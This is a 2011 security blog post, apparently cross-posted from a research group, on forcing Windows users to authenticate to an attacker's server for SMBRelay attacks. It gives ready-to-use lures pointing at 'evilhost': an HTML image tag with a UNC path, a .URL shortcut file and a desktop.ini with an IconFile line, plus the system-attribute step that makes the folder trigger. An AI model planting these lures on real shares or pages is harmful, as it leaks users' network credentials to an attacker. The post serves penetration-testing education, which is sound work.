SMBRelay Attacks on Corporate Users

Thursday, April 07, 2011

Alexander Polyakov

7d55c20d433dd60022642d3ab77b8efb

Article by Alexey Tuyrin from DSecRG

Today we will talk about client-side attacks. An attack of a network is a progressive action. Usually, we escalate our rights step-by-step from nothing to a domain administrator.

Even casual un-privileged users can give us something interesting, for example access to some shared resources. But how can we get these user rights?

We can enforce users to authenticate on a controlled machine. There are alt least three main ways to interact with user. They are very abstract.

1) HTML and browser

We can use a social engineering or a MitM attack like dns-poisoning to bring users to our web site with a following code:

< i m g  s r c= ” \ \ e v i l h o s t \ t e s t ” >

Their browsers will try to take the image from our server and give us their credentials. At the same time users will not know about such actions.

2) Crafted document

We can create special document (like MS Excel file) and send it to users via e-mail or put it on shared resources. When a user opens it, office program tries to connect our server and give us user's credential. We will talk about it in the next blog post.

3) Windows Explorer and shared resources

If we have permission to write to some shared resources (for example file server or or directory on terminal server), we can create a specified file.

When somebody browses to a folder with the file, Explorer will try to connect to our server without any interaction from a user.

Such a "specified file" can be:

- .LNK - Windows Shortcut File.

There is ability for setting an icon to file. We can set path of it to our server and Explorer will try to download it.

- .URL - Internet Location File.

Like LNK-file - setting an icon to a file, but URL is a primitive text file. So we write a following text and save it with URL extension:
[InternetShortcut]
URL=http://dsecrg.com/
IconIndex=3
IconFile=//evilhost/test

- desktop.ini.

The file is used for folder's customization. There is some different fields (InfoTip, desktop.ini, LocalizedResourceName, IconFile (IconResource for Vista/7)) which can give us necessary links to our server.

Fields' influences on Explorer are different (you can read about it here http://www.tarasco.org/security/payload/index.html).

A little limitation is a folder with desktop.ini, which should be ‘system'. It can be set by ‘attrib +s folder_name'. But there are some pluses: desktop.ini are ‘hidden' by default, and folders like "My Documents", "Disc C(D, E,..)", "Desktop" are ‘system' by default.

Simple example of desktop.ini:

[.ShellClassInfo]

IconFile=//evilhost/test

 

Cross-posted from Digital Security Research Group

Possibly Related Articles:
10234
Network Access Control
Information Security
MITM Hacking Penetration Testing Attacks Network Security SMBRelay
Post Rating I Like this!
The views expressed in this post are the opinions of the Infosec Island member that posted this content. Infosec Island is not responsible for the content or messaging of this post.

Unauthorized reproduction of this article (in part or in whole) is prohibited without the express written permission of Infosec Island and the Infosec Island member that posted this content--this includes using our RSS feed for any purpose other than personal use.